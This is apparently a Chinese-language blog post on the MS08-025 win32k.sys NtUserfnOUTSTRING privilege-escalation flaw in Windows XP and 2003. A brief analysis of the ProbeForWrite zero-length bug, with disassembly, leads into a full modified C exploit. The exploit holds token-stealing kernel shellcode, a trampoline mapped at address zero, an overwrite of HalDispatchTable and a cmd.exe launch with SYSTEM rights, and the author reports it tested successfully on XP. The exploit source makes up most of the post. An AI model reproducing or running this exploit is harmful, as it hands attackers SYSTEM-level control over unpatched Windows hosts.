MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit

问题出在ProbeForWrite在处理指定的地址可写时,传入指定的长度为0时就不进行判断,就可以造成指定的地址可写,这样我们就可以写任意的内核空间了,



.text:BF850BB7                 push    14h

.text:BF850BB9                 push    offset stru_BF9940D0

.text:BF850BBE                 call    __SEH_prolog

.text:BF850BC3                 xor     edx, edx

.text:BF850BC5                 mov     [ebp+ms_exc.disabled], edx

.text:BF850BC8                 mov     eax, [ebp+var_20]

.text:BF850BCB                 mov     ecx, 7FFFFFFFh

.text:BF850BD0                 and     eax, ecx

.text:BF850BD2                 mov     esi, [ebp+arg_18]

.text:BF850BD5                 shl     esi, 1Fh

.text:BF850BD8                 or      eax, esi

.text:BF850BDA                 mov     [ebp+var_20], eax

.text:BF850BDD                 mov     esi, eax

.text:BF850BDF                 xor     esi, [ebp+arg_8]

.text:BF850BE2                 and     esi, ecx

.text:BF850BE4                 xor     eax, esi

.text:BF850BE6                 mov     [ebp+var_20], eax

.text:BF850BE9                 cmp     [ebp+arg_18], edx

.text:BF850BEC                 jnz     short loc_BF850BFA

.text:BF850BEE                 lea     esi, [eax+eax] //当eax=0x80000000时,esi就会整形溢出为0,这样就触发了可写内核空间

.text:BF850BF1                 xor     esi, eax

.text:BF850BF3                 and     esi, ecx

.text:BF850BF5                 xor     eax, esi

.text:BF850BF7                 mov     [ebp+var_20], eax

.text:BF850BFA

.text:BF850BFA loc_BF850BFA:                           ; CODE XREF: NtUserfnOUTSTRING(x,x,x,x,x,x,x)+35 j

.text:BF850BFA                 mov     [ebp+var_24], edx

.text:BF850BFD                 mov     esi, [ebp+Address]

.text:BF850C00                 mov     [ebp+var_1C], esi

.text:BF850C03                 xor     ebx, ebx

.text:BF850C05                 inc     ebx

.text:BF850C06                 push    ebx             ; Alignment

.text:BF850C07                 and     eax, ecx

.text:BF850C09                 push    eax             ; Length //length=0

.text:BF850C0A                 push    esi             ; Address

.text:BF850C0B                 call    ds:__imp__ProbeForWrite@12 ; ProbeForWrite(x,x,x)

.text:BF850C11                 or      [ebp+ms_exc.disabled], 0FFFFFFFFh

.text:BF850C15                 mov     eax, [ebp+arg_14]

.text:BF850C18                 add     eax, 6

.text:BF850C1B                 and     eax, 1Fh

.text:BF850C1E                 push    [ebp+arg_10]

.text:BF850C21                 lea     ecx, [ebp+var_24]

.text:BF850C24                 push    ecx

.text:BF850C25                 push    [ebp+arg_8]

.text:BF850C28                 push    [ebp+arg_4]

.text:BF850C2B                 push    [ebp+arg_0]

.text:BF850C2E                 mov     ecx, _gpsi

.text:BF850C34                 call    dword ptr [ecx+eax*4+8]

.text:BF850C38                 mov     edi, eax

.text:BF850C3A                 test    edi, edi

.text:BF850C3C                 jz      loc_BF850B94

.text:BF850C42

.text:BF850C42 loc_BF850C42:                           ; CODE XREF: NtUserfnOUTSTRING(x,x,x,x,x,x,x)-20 j

.text:BF850C42                                         ; NtUserfnOUTSTRING(x,x,x,x,x,x,x)-A j

.text:BF850C42                 mov     eax, edi

.text:BF850C44                 call    __SEH_epilog

.text:BF850C49                 retn    1Ch

.text:BF850C49 _NtUserfnOUTSTRING@28 endp

.text:BF850C49

.text:BF850C4C ; ---------------------------------------------------------



这里是通过覆盖了内核中的 HalDispatchTable表来执行shellcode的



下面是我修改ruben的exploit



// ms08-25-exploit #1

// This exploit takes advantage of one of the vulnerabilities

// patched in the Microsoft Security bulletin MS08-25

// http://www.microsoft.com/technet/sec.../ms08-025.mspx

// ---------------------------------------

// For research purposes ONLY.

// ---------------------------------------

// Ruben Santamarta

// www.reversemode.com

// http://hi.baidu.com/vessial changed the shellcode



#include "stdafx.h"







typedef enum _KPROFILE_SOURCE {





    ProfileTime,

    ProfileAlignmentFixup,

    ProfileTotalIssues,

    ProfilePipelineDry,

    ProfileLoadInstructions,

    ProfilePipelineFrozen,

    ProfileBranchInstructions,

    ProfileTotalNonissues,

    ProfileDcacheMisses,

    ProfileIcacheMisses,

    ProfileCacheMisses,

    ProfileBranchMispredictions,

    ProfileStoreInstructions,

    ProfileFpInstructions,

    ProfileIntegerInstructions,

    Profile2Issue,

    Profile3Issue,

    Profile4Issue,

    ProfileSpecialInstructions,

    ProfileTotalCycles,

    ProfileIcacheIssues,

    ProfileDcacheAccesses,

    ProfileMemoryBarrierCycles,

    ProfileLoadLinkedIssues,

    ProfileMaximum



} KPROFILE_SOURCE, *PKPROFILE_SOURCE;



typedef DWORD (WINAPI *PNTQUERYINTERVAL)( KPROFILE_SOURCE ProfileSource,

                                           PULONG          Interval );



typedef NTSTATUS (WINAPI *PNTALLOCATE)(   IN HANDLE               ProcessHandle,

                                       IN OUT PVOID            *BaseAddress,

                                       IN ULONG                ZeroBits,

                                       IN OUT PULONG           RegionSize,

                                       IN ULONG                AllocationType,

                                       IN ULONG                Protect );



OSVERSIONINFOEX OsVersionInfo;



_declspec(naked) int ShellCode()

{

  

      if ( OsVersionInfo.dwMinorVersion == 1 ) {



       __asm {



               nop

               nop

               nop

               nop

               nop

               nop



               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)

               Mov eax,[eax]



               mov esi,[eax+0x220]

               mov eax,esi



searchXp:



               mov eax,[eax+0x88]

               sub eax,0x88

               mov edx,[eax+0x84]

               cmp edx,0x4 // Find System Process

               jne searchXp



               mov eax,[eax+0xc8] // 获取system进程的token

               mov [esi+0xc8],eax // 修改当前进程的token



               ret 8



       }

   }

   if ( OsVersionInfo.dwMinorVersion == 2 ) {



       __asm {



           nop

               nop

               nop

               nop

               nop

               nop



               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)

               Mov eax,[eax]



               mov esi,[eax+0x220]

               mov eax,esi



search2003:



               mov eax,[eax+0x98]

               sub eax,0x98

               mov edx,[eax+0x94]

                cmp edx,0x4 // Find System Process

               jne search2003



               mov eax,[eax+0xd8] // 获取system进程的token

               mov [esi+0xd8],eax // 修改当前进程的token

               ret 8



       }

   }



  

}

_declspec(naked) ULONG __stdcall NtUserMessageCall

(

   IN HWND arg1,

    IN ULONG_PTR arg2,

    IN ULONG_PTR arg3,

    IN ULONG_PTR arg4,

    IN ULONG_PTR arg5,

    IN ULONG_PTR arg6,

   IN ULONG_PTR arg7

)

{

   __asm

   {

       mov eax, 000011cch

       mov edx, 7ffe0300h

       call dword ptr [edx]

       retn 1Ch

   }

}





void InitTrampoline()

{



   PNTALLOCATE NtAllocateVirtualMemory;

   LPVOID       addr = (LPVOID)3;

   DWORD       dwShellSize=0x1000;

   unsigned char trampoline[]="/x68/x00/x00/x00/x00" //push 0x0

                               "/xc3";                                           // retn



   NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");

  

   if( !NtAllocateVirtualMemory )

       exit(0);  

  

   NtAllocateVirtualMemory(   (HANDLE)-1,

                               &addr,

                               0,

                               &dwShellSize,

                               MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,

                               PAGE_EXECUTE_READWRITE );



   if( (ULONG_PTR)addr )

   {

       printf("/n[++] Error Allocating memory/n");

       exit(0);  

   }



  

   *(ULONG_PTR*)(trampoline+1)=(ULONG_PTR)ShellCode;//push &shellcode

                   // retn

                                                                                             这样就可以直接执行shellcode了

   memcpy(NULL,trampoline,sizeof(trampoline)-1);       指 跳转指令写入0x0地址,cool吧,你有做过吗?:)

}

int Callback_Overview()

{

   printf("/n");

   printf("=====================================================================   /n");

   printf("/t/tMicrosoft Windows XP SP2 - MS08-025 -       /n");

   printf("/twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit   /n");

   printf("=====================================================================   /n");

   printf("+ References:/n");

   printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx/n");

   printf(" http://www.reversemode.com/n/n");

    printf(" http://hi.baidu.com/vessial/n/n");

    printf(" vessial just changed the shellcode can get the system token/n");

   return 1;

}





int main(int argc, char **argv)

{

  



   PNTQUERYINTERVAL   NtQueryIntervalProfile;

   KPROFILE_SOURCE   stProfile = ProfileTotalIssues;



   ULONG_PTR   HalDispatchTable;

   ULONG_PTR   BaseNt=0;

   ULONG_PTR   result;

  

   HMODULE       hKernel;

   char       szNtos[MAX_PATH] = {0};



   STARTUPINFOA                stStartup;

   PROCESS_INFORMATION            pi;





   Callback_Overview();

   

   LoadLibrary("user32.dll");



   if( GetDriverInfoByName("krnl",szNtos,&BaseNt) )

   {

       printf("[+] %s loaded at   /t [ 0x%p ]/n",szNtos,BaseNt);

      

   }

   else

   {

       printf("[!!] Kernel not found :?/n");

       return FALSE;

   }



   if( strstr(szNtos,"krnlpa") )

   {

       hKernel = LoadLibraryExA("ntkrnlpa.exe",0,1);  

   }

   else

   {

       hKernel = LoadLibraryExA("ntoskrnl.exe",0,1);

   }  



   HalDispatchTable = (ULONG_PTR)GetProcAddress(hKernel, "HalDispatchTable");



   if( !HalDispatchTable )

   {

       printf("[!!] HalDispatchTable not found/n");

       return FALSE;

   }

  

  



   RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );

   OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);

   GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);



   if ( OsVersionInfo.dwMajorVersion != 5 ) {



       printf( "Not NT5 system/n" );

       ExitProcess( 0 );

   }

   //Get Operatiny System Version

   HalDispatchTable -= ( ULONG_PTR )hKernel;

   HalDispatchTable += BaseNt;



   printf("[+] HalDispatchTable found    /t/t/t [ 0x%p ]/n",HalDispatchTable);

  

   printf("[+] NtQueryIntervalProfile ");



   NtQueryIntervalProfile = ( PNTQUERYINTERVAL )

                           GetProcAddress(   GetModuleHandle("ntdll.dll")

                                           ,"NtQueryIntervalProfile");

  

   if( !NtQueryIntervalProfile )

   {

       printf("[!!] Unable to resolve NtQueryIntervalProfile/n");

       return FALSE;

   }

   printf( "/t/t/t [ 0x%p ]/n",NtQueryIntervalProfile );

  

   InitTrampoline();



   NtUserMessageCall(   GetDesktopWindow(),

                       0xD,

                       0x80000000,

                       HalDispatchTable+sizeof(WORD)+sizeof(ULONG_PTR),

                       0x0,

                       0x0,

                       0x0);

   NtUserMessageCall(   GetDesktopWindow(),

                       0xD,

                       0x80000000,

                       HalDispatchTable+sizeof(ULONG_PTR),

                       0x0,

                       0x0,

                       0x0);

   printf("/n[+] Executing Shellcode.../n");

  

   NtQueryIntervalProfile(stProfile,&result);//这里的作用是为了call 0x0,真是经典

   GetStartupInfo( &stStartup );



   CreateProcess( NULL,

       "cmd.exe",

       NULL,

       NULL,

       TRUE,

       NULL,

       NULL,

       NULL,

       &stStartup,

       &pi );   //此时创建的cmd.exe是SYSTEM权限



   

   printf("[+] Exiting.../n");



   return TRUE;

}



  在XP系统下测试成功:)

  2003还没有试过,大家试试:)

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值